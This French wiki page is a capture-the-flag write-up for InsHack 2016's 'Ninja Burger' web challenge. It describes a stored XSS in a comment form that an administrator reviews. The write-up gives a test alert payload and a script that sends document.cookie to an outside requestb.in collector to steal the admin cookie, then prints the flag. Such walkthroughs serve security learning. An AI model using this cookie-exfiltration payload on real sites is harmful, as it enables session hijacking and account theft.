Outils pour utilisateurs
ctf:2016:inshack:web100_ninja_burger
WEB 100 - Ninja Burger
Le challenge est un site web , qui nous montre des photos de ninja.
Le but est de faire voter les personnes pour le ninja qu'ils préfèrent.
Sur le bas du site un formulaire est mit à disposition pour laisser des commentaires.
Deux champs sont disponibles :
- Nom
- Commentaire
Premier test :
Tester les XSS dans le champ commentaire
<script>alert('XSS_de_la_mort')</script>
Génial sa fonctionne :
Chaque message est validé par un administrateur.
Du coup nous récupérons le cookie de l'administrateur :
<script>window.open("http://requestb.in/yxmhd6yx?cookie="+document.cookie)</script>
Après quelques (longues) minutes nous obtenons le cookie
Hop le flag : FLAG{x5S ar3 fUn ! Us3 at Least HtTpONLY cooKiES}
ctf/2016/inshack/web100_ninja_burger.txt · Dernière modification: 2016/07/04 08:39 (modification externe)
Outils de la page
Sauf mention contraire, le contenu de ce wiki est placé sous les termes de la licence suivante : CC Attribution-Share Alike 4.0 International
